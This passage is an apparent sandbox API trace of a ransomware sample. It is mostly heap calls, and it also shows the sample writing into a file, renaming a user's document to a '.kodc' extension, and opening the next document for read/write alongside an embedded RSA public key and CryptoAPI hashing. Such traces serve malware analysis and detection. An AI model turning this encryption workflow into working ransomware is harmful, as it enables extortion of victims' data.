Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fac8 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fd50 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a610 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a640 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a658 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.652] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a640 | out: hHeap=0x630000) returned 1 [0097.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a658 | out: hHeap=0x630000) returned 1 [0097.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a658 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a640 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a658 | out: hHeap=0x630000) returned 1 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a640 | out: hHeap=0x630000) returned 1 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.653] GetCurrentThreadId () returned 0x42c [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695d98 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.653] GetCurrentThreadId () returned 0x42c [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a640 [0097.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a658 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a628 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a670 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a640 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a640 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0097.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a640 | out: hHeap=0x630000) returned 1 [0097.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a670 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a658 | out: hHeap=0x630000) returned 1 [0097.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a628 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a610 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fd50 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.657] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x146ca, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x146ca, lpOverlapped=0x0) returned 1 [0097.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.657] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x146cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.658] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0097.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0097.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.658] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.658] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.658] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.658] CloseHandle (hObject=0x5cc) returned 1 [0097.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0097.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.660] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B1thbOPkcKcfqX.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b1thbopkckcfqx.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B1thbOPkcKcfqX.ppt.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b1thbopkckcfqx.ppt.kodc")) returned 1 [0097.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.660] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.660] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.662] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73682a60, ftCreationTime.dwHighDateTime=0x1d5b66b, ftLastAccessTime.dwLowDateTime=0xfa3ff820, ftLastAccessTime.dwHighDateTime=0x1d5bade, ftLastWriteTime.dwLowDateTime=0xfa3ff820, ftLastWriteTime.dwHighDateTime=0x1d5bade, nFileSizeHigh=0x0, nFileSizeLow=0x9998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC_f1u.ods", cAlternateFileName="")) returned 1 [0097.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.662] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BC_f1u.ods") returned=".ods" [0097.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BC_f1u.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bc_f1u.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.662] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=39320) returned 1 [0097.662] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.666] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9972, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.666] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.667] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.667] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x9998, lpOverlapped=0x0) returned 1 [0097.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.668] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0097.669] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.669] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.669] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.669] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.669] GetLastError () returned 0x0 [0097.669] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.669] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0097.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.669] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.669] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: 